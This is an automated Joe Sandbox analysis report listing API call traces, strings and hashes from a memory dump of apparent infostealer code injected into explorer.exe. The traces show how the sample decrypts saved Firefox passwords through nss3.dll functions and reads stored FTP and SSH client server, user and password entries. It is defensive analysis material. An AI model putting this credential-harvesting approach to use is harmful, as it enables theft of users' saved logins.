                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3498533004-0
                                                                                                                              • Opcode ID: 05763715d87bd0c3ab23f0155e109e06f6b14de45898c3cbae8ecd3c6a8c2b8d
                                                                                                                              • Instruction ID: aebc450139c8a05e9c07e245d34161f6eb9cc4269ea946430b96c7bf77a72177
                                                                                                                              • Opcode Fuzzy Hash: 05763715d87bd0c3ab23f0155e109e06f6b14de45898c3cbae8ecd3c6a8c2b8d
                                                                                                                              • Instruction Fuzzy Hash: F8D0E265253A3062E9F626257C1CEA76E1CEF02BBAB440618B41DE60D0E328889782E0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0080116F
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00801A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2), ref: 00801020
                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801027
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2580854192-0
                                                                                                                              • Opcode ID: 39ba72a1223e1082b3fcb5dc1f613408aa444fad04efac3d3b17a55634ac1bba
                                                                                                                              • Instruction ID: ceb79ccb24743dd0bbd77301fd99ff6e0a7fd2a94470e50670d62162b545ea6e
                                                                                                                              • Opcode Fuzzy Hash: 39ba72a1223e1082b3fcb5dc1f613408aa444fad04efac3d3b17a55634ac1bba
                                                                                                                              • Instruction Fuzzy Hash: 62C08C3104072092CEE027A43C0CBDA3B08FF09333F000041F501D3192DA698C4086A0
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1357844191-0
                                                                                                                              • Opcode ID: 25102937b6241c740c3137fe64dde8268457757e13e7f9fc955d72428458cd09
                                                                                                                              • Instruction ID: 3c894caa3750dc36d689ab875782bb7069e84ecf4ef51a5ff270110626467b15
                                                                                                                              • Opcode Fuzzy Hash: 25102937b6241c740c3137fe64dde8268457757e13e7f9fc955d72428458cd09
                                                                                                                              • Instruction Fuzzy Hash: D5A002755907049BDD4557B49E0DA2A3518FB44703F904544714587451F96854148721
                                                                                                                              APIs
                                                                                                                              • RtlZeroMemory.NTDLL(?,00000018), ref: 008012B5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryZero
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 816449071-0
                                                                                                                              • Opcode ID: 371d506e2a68e66d76572428b1717cc96e619a28d6736bfe2e18abf69033bb8d
                                                                                                                              • Instruction ID: e4926acb79874ad46098ae6a267356af06cc6b5f10eb5602a14961516db0378e
                                                                                                                              • Opcode Fuzzy Hash: 371d506e2a68e66d76572428b1717cc96e619a28d6736bfe2e18abf69033bb8d
                                                                                                                              • Instruction Fuzzy Hash: D311E6B1A01209AFDB50DFA5DD88ABEBBFCFB08351B504029F945E7240E7349D00CB60
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(00000000,00000000,00802C8F,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00801BAA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3188754299-0
                                                                                                                              • Opcode ID: 624898bdbd4d11d2e259ae60c58d80dcaa1e0f0737a3339386c2d9f460201639
                                                                                                                              • Instruction ID: 8f7b387317ef1933f3ff40643a64d6702f94dbe907d1d15cae6d584f9e6c7273
                                                                                                                              • Opcode Fuzzy Hash: 624898bdbd4d11d2e259ae60c58d80dcaa1e0f0737a3339386c2d9f460201639
                                                                                                                              • Instruction Fuzzy Hash: 8BD0A933E0293082CEA416783C58892B280BA0077631A0BB4FC26F30D0F328CC8242C0
                                                                                                                              APIs
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00801684
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateGlobalStream
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2244384528-0
                                                                                                                              • Opcode ID: 4fe39de92ea68bb46a46f8db5bef3012a412eab48fd8fa7edcdf72032ce2c3c1
                                                                                                                              • Instruction ID: 62c25343dd0fe9b9c37a01fb4e6e372eaf0e69a918ac45f34d37ee5954f9341b
                                                                                                                              • Opcode Fuzzy Hash: 4fe39de92ea68bb46a46f8db5bef3012a412eab48fd8fa7edcdf72032ce2c3c1
                                                                                                                              • Instruction Fuzzy Hash: D5C012301202219EEBA01A608C09B8626D4AF297B2F060A2AA0819A0C0E2A908C08A90
                                                                                                                              APIs
                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0080158A), ref: 00801056
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              • Opcode ID: 11a9f181add896e10fb5ba244aa6eb0fe0a8961aa209457fe6bb0774bc30ee7a
                                                                                                                              • Instruction ID: 91f9c49677c26917e426947995963a89b802e5728e3fc3edd6aa30aeb203f983
                                                                                                                              • Opcode Fuzzy Hash: 11a9f181add896e10fb5ba244aa6eb0fe0a8961aa209457fe6bb0774bc30ee7a
                                                                                                                              • Instruction Fuzzy Hash: ECA002F07D57007AFDA95762AE1FF152938A750F13F500344B30D7D0D065E87514852D
                                                                                                                              APIs
                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00804A5B,?,?,00000000,?,?,?,?,00804B66,?), ref: 00801065
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1263568516-0
                                                                                                                              • Opcode ID: 5140f037142d64d5c83a9ab350135dbd6c39ae110d2db98eabfaed015ef28934
                                                                                                                              • Instruction ID: 7dfdc82872c291555c15607888c0087b09622bd812f287d4405b7490e5482391
                                                                                                                              • Opcode Fuzzy Hash: 5140f037142d64d5c83a9ab350135dbd6c39ae110d2db98eabfaed015ef28934
                                                                                                                              • Instruction Fuzzy Hash: EBA002746D0B00A6EDF457205D0AF1536147B40B03F6045447241AA0D15DA9E0548A18
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(?,00000080,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000), ref: 008034C0
                                                                                                                                • Part of subcall function 008033C3: NtQueryInformationFile.NTDLL(00000000,00002000,00000000,00002000,0000002F), ref: 00803401
                                                                                                                              • OpenProcess.KERNEL32(00000440,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,008037A8), ref: 008034E9
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 0080351E
                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,00000033,00000000,?,?), ref: 00803541
                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00803586
                                                                                                                              • DuplicateHandle.KERNEL32(00000000,00000000,00000000), ref: 0080358F
                                                                                                                              • lstrcmpiW.KERNEL32(00000000,File), ref: 008035B6
                                                                                                                              • NtQueryObject.NTDLL(?,00000001,00000000,00001000,00000000), ref: 008035DE
                                                                                                                              • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 008035F6
                                                                                                                              • StrRChrW.SHLWAPI(?,00000000,0000005C), ref: 00803606
                                                                                                                              • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0080361E
                                                                                                                              • GetFileSize.KERNEL32(?,00000000), ref: 00803631
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00803658
                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0080366B
                                                                                                                              • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00803681
                                                                                                                              • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 008036AD
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 008036C0
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,008037A8), ref: 008036F5
                                                                                                                                • Part of subcall function 00801C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00801CC0
                                                                                                                                • Part of subcall function 00801C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00801CDA
                                                                                                                                • Part of subcall function 00801C9F: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00801CE6
                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,008037A8), ref: 00803707
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                                                                                                              • String ID: File
                                                                                                                              • API String ID: 3915112439-749574446
                                                                                                                              • Opcode ID: 1c415b3159954f4c3f2b2b2be446962c354ddf5534b094094b8797ef465126ab
                                                                                                                              • Instruction ID: 361d50bd6f6ad5f2f13bce865a6a8575a6cee4f940a624b00b974f67a465d24a
                                                                                                                              • Opcode Fuzzy Hash: 1c415b3159954f4c3f2b2b2be446962c354ddf5534b094094b8797ef465126ab
                                                                                                                              • Instruction Fuzzy Hash: 2D618E70204701AFD7909F20CC88B2B7BADFB84755F400928F996E72E1EB35DA549B52
                                                                                                                              APIs
                                                                                                                              • memcmp.NTDLL(localhost,00000007,00000009,00000002,?,00000000,000001D8,?,00000000), ref: 00854502
                                                                                                                              • memcmp.NTDLL(00000000,?,?,00000002,?,00000000,000001D8,?,00000000), ref: 0085475F
                                                                                                                              • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 00854803
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                              • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                              • API String ID: 231171946-1096842476
                                                                                                                              • Opcode ID: a6f19f82d7fb0fbbc08e17d00bc0fb5459f5e8858fdc83320679d0f8369c010c
                                                                                                                              • Instruction ID: ec35b151fe3c1bf8352401d0f78bc29ff3e05ab2743eac483ba9571da38ff4eb
                                                                                                                              • Opcode Fuzzy Hash: a6f19f82d7fb0fbbc08e17d00bc0fb5459f5e8858fdc83320679d0f8369c010c
                                                                                                                              • Instruction Fuzzy Hash: 49C10474A083459BEB34CE18849077ABBD1FB9A31EF14256EECD5C7282D724D8CD8B46
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00806AAA: memset.NTDLL ref: 00806AC5
                                                                                                                              • memset.NTDLL ref: 00825F53
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memset
                                                                                                                              • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                                                              • API String ID: 2221118986-594550510
                                                                                                                              • Opcode ID: ceec4993e951546bbd3bc0e6b2082471151c07ae32c35bfa7dcdc7a9f6329a19
                                                                                                                              • Instruction ID: 90b455b9f352de6fa1a98238fa444f9019b2ba67c4e7257a8a31321c3bf3fbdd
                                                                                                                              • Opcode Fuzzy Hash: ceec4993e951546bbd3bc0e6b2082471151c07ae32c35bfa7dcdc7a9f6329a19
                                                                                                                              • Instruction Fuzzy Hash: F5C16D706047119FCB14DF29D880A2AB7E2FF88714F14892DF855D7281EB35EDA6CB92
                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.COMBASE(008562B0,00000000,00000001,008562A0,?), ref: 0080445F
                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 008044AA
                                                                                                                              • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0080456E
                                                                                                                              • lstrcmpiW.KERNEL32(Servers,?), ref: 0080457D
                                                                                                                              • lstrcmpiW.KERNEL32(Settings,?), ref: 0080458C
                                                                                                                                • Part of subcall function 008011E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,008046E3), ref: 008011ED
                                                                                                                                • Part of subcall function 008011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0080120F
                                                                                                                                • Part of subcall function 008011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00801231
                                                                                                                              • lstrcmpiW.KERNEL32(Server,?), ref: 008045BE
                                                                                                                              • lstrcmpiW.KERNEL32(LastServer,?), ref: 008045CD
                                                                                                                              • lstrcmpiW.KERNEL32(Host,?), ref: 00804657
                                                                                                                              • lstrcmpiW.KERNEL32(Port,?), ref: 00804679
                                                                                                                              • lstrcmpiW.KERNEL32(User,?), ref: 0080469F
                                                                                                                              • lstrcmpiW.KERNEL32(Pass,?), ref: 008046C5
                                                                                                                              • wsprintfW.USER32 ref: 0080471E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                                                                              • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                                                                              • API String ID: 2230072276-1234691226
                                                                                                                              • Opcode ID: 33cc687497e77ed4d6374d0bac270f2296916d2626c41458934360f81dabded0
                                                                                                                              • Instruction ID: 95f87cf7294b0106f992468250be8995d3b164656ee9d79d90df00dc7e59b474
                                                                                                                              • Opcode Fuzzy Hash: 33cc687497e77ed4d6374d0bac270f2296916d2626c41458934360f81dabded0
                                                                                                                              • Instruction Fuzzy Hash: DCB107B1244306AFD740DF64C884E2AB7E9FF89755F10895CF655CB2A0EB71E80ACB52
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00801000: GetProcessHeap.KERNEL32(00000008,?,008011C7,?,?,00000001,00000000,?), ref: 00801003
                                                                                                                                • Part of subcall function 00801000: RtlAllocateHeap.NTDLL(00000000), ref: 0080100A
                                                                                                                                • Part of subcall function 00801090: lstrlenW.KERNEL32(?,?,00000000,008017E5), ref: 00801097
                                                                                                                                • Part of subcall function 00801090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 008010A8
                                                                                                                                • Part of subcall function 008019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00802CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 008019C4
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00802503
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0080250A
                                                                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00802563
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00802570
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00802591
                                                                                                                              • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0080259E
                                                                                                                              • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 008025AB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 008025B8
                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 008025C5
                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 008025D2
                                                                                                                              • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 008025DF
                                                                                                                                • Part of subcall function 0080190B: lstrlen.KERNEL32(?,?,?,?,00000000,00802783), ref: 0080192B
                                                                                                                                • Part of subcall function 0080190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00802783), ref: 00801930
                                                                                                                                • Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,?), ref: 00801946
                                                                                                                                • Part of subcall function 0080190B: lstrcat.KERNEL32(00000000,00000000), ref: 0080194A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                                                                              • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                                                                              • API String ID: 3366569387-3272982511
                                                                                                                              • Opcode ID: e5d4f6aeb80c8385769561e34de00ccad274dbb8cbe5fbebdd306c84c618c77c
                                                                                                                              • Instruction ID: d51e2bb4796879e0eaa6e308b44b78e81bedf4099a11138778617950d885d258
                                                                                                                              • Opcode Fuzzy Hash: e5d4f6aeb80c8385769561e34de00ccad274dbb8cbe5fbebdd306c84c618c77c
                                                                                                                              • Instruction Fuzzy Hash: 39415931A007018BCF94AF795C5C52E7AE9FB95752748012EE951D33E2EFF98C058B52
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00805BF5: memset.NTDLL ref: 00805C07
                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 008060E1
                                                                                                                              • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 008060EC
                                                                                                                              • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00806113
                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0080618E
                                                                                                                              • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 008061B5
                                                                                                                              • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 008061C1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _alldiv$_allrem$memset
                                                                                                                              • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                                                                              • API String ID: 2557048445-1989508764
                                                                                                                              • Opcode ID: f708a5add0c2a2054645f9eea0782ecf03870db1b6a7c890ed16eac6160069ab
                                                                                                                              • Instruction ID: 7d4073c61cb58d5bd0d640e060a761033aced4f55ef4e13440fe2f4542a7bd74
                                                                                                                              • Opcode Fuzzy Hash: f708a5add0c2a2054645f9eea0782ecf03870db1b6a7c890ed16eac6160069ab
                                                                                                                              • Instruction Fuzzy Hash: 6EB18FB2908B879BD7719E28CC85B3B7BD4FB80304F140559F982E61D1FA24DD748AA2
                                                                                                                              APIs
                                                                                                                              • memcmp.NTDLL(0085637A,BINARY,00000007), ref: 0081D324
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memcmp
                                                                                                                              • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                                                                              • API String ID: 1475443563-3683840195
                                                                                                                              • Opcode ID: ca6e7c40ff4bbfcce15b212faf5646b810e2b61c0a5ab5c5fde61122e3eca608
                                                                                                                              • Instruction ID: 4dd90949c729be4d335f9614d07bf9f6bbf6bef61f4d5655e18804bef1409dfc
                                                                                                                              • Opcode Fuzzy Hash: ca6e7c40ff4bbfcce15b212faf5646b810e2b61c0a5ab5c5fde61122e3eca608
                                                                                                                              • Instruction Fuzzy Hash: E351E271908304ABC710DF54CC41BAAB3A9FF45305F14486AFD62EB281FB74E849CBA2
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 008019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A1E
                                                                                                                                • Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A3C
                                                                                                                                • Part of subcall function 008019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00801A75
                                                                                                                                • Part of subcall function 008019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00801AE2,PortNumber,00000000,00000000), ref: 00801A98
                                                                                                                                • Part of subcall function 0080482C: lstrlenW.KERNEL32(?), ref: 00804845
                                                                                                                                • Part of subcall function 0080482C: lstrlenW.KERNEL32(?), ref: 0080488F
                                                                                                                                • Part of subcall function 0080482C: lstrlenW.KERNEL32(?), ref: 00804897
                                                                                                                              • wsprintfW.USER32 ref: 008049A7
                                                                                                                              • wsprintfW.USER32 ref: 008049B9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                              • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                              • API String ID: 2889301010-4273187114
                                                                                                                              • Opcode ID: add35eb28b405650205ad5c9ab9b6bfec1a51d9466743b95753c794387de6641
                                                                                                                              • Instruction ID: 540f4b880fff55dbc5847e5d3af8098261985d6fe3bb565181fee66dc647fbd8
                                                                                                                              • Opcode Fuzzy Hash: add35eb28b405650205ad5c9ab9b6bfec1a51d9466743b95753c794387de6641
                                                                                                                              • Instruction Fuzzy Hash: 2E3126A0B403045BCB90AB6ACC0592BBEDDFFC6748B45492DB640C32D1EFB1CC1583A2
                                                                                                                              APIs
                                                                                                                              • memcpy.NTDLL(?,?,?,?,00000000), ref: 0080FB32
                                                                                                                              • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0080FB4D
                                                                                                                              • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0080FB60
                                                                                                                              • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0080FB95
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: memcpy
                                                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                                                              • API String ID: 3510742995-3408036318
                                                                                                                              • Opcode ID: 83c94c64a845f227d15fcf9cef2706dfacf7db9cd6c596a32c4c95e0f7d56112
                                                                                                                              • Instruction ID: 54326200eeebbb4fc652582a174ada060da0fd0b5b3533a9b519aba8ccb59ec7
                                                                                                                              • Opcode Fuzzy Hash: 83c94c64a845f227d15fcf9cef2706dfacf7db9cd6c596a32c4c95e0f7d56112
                                                                                                                              • Instruction Fuzzy Hash: 7CD1ADB16083418FDB64DF28C881B1ABBE1FF95314F08853DED98CB292EA74D805CB52
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %$-x0$NaN
                                                                                                                              • API String ID: 0-62881354
                                                                                                                              • Opcode ID: a345f1c77a93458ca934aa804edc7935dec60946fb289187c992fd78f723814c
                                                                                                                              • Instruction ID: 4af05c0b54586f2dacbdce71352deabebba6c32b8d07b5038620a6a6ad600ea8
                                                                                                                              • Opcode Fuzzy Hash: a345f1c77a93458ca934aa804edc7935dec60946fb289187c992fd78f723814c
                                                                                                                              • Instruction Fuzzy Hash: 29D1F430E0C7928BE7A58A288C9032BBBE1FF95304F28495DF9C2C73D1D664E955D782
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000B.00000002.2706373172.0000000000801000.00000040.80000000.00040000.00000000.sdmp, Offset: 00801000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_11_2_801000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: -x0$NaN
                                                                                                                              • API String ID: 0-3447725786
                                                                                                                              • Opcode ID: 02e4140addec74b8a3b095d1c51008528f38611a5c1305f321259de480d4cbc4
                                                                                                                              • Instruction ID: 6095e3af930c7291edd0d2dc7b6bdeadcb074470726a9a4fc4abf7304f241d62
